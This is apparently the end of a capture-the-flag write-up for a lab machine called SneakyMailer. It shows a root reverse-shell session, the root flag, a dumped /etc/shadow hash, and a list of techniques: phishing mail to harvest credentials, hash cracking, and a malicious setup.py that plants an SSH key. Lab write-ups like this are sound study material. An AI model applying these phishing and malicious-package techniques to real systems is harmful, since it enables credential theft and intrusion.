Ncat: Connection from 10.10.10.197:40898.
root@sneakymailer:/tmp/pip-req-build-ht66bwjk# id
id
uid=0(root) gid=0(root) groups=0(root)
root@sneakymailer:/tmp/pip-req-build-ht66bwjk# whoami
whoami
root
root@sneakymailer:/tmp/pip-req-build-ht66bwjk# cd /root
cd /root
root@sneakymailer:~# ls
ls
root.txt
root@sneakymailer:~# cat root.txt
cat root.txt
464554578c27d528fb9c5710ec3de868
  • the root hash from /etc/shadow (to unlock other writeups):

root:$6$jJW2Iy0Knfw7c6gr$/p2MAEhr7Fy4bMIT8szzgnSkL2kp8EaPKvGQ//cfcX0bMnazYHzNwWIsGaGwgceFyftI2Xihj0rrhUbfkrzhf.:18402:0:99999:7:::

Summary of knowledge

  • vhost fuzzing with ffuf
  • mass phishing mail with swaks to harvest credentials
  • reading a mailbox over IMAP with Evolution
  • cracking the pypiserver .htpasswd (md5apr1) hash
  • malicious setup.py uploaded to pypiserver to plant an SSH key for low
  • scp file transfer
  • sudo pip3 install of a local package for root

Contact me

  • QQ: 1185151867
  • twitter: https://twitter.com/fdlucifer11
  • github: https://github.com/FDlucifer

I’m lUc1f3r11, a ctfer, reverse engineer, ioter, red teamer, coder, gopher, pythoner, AI lover, security researcher, hacker, bug hunter and more…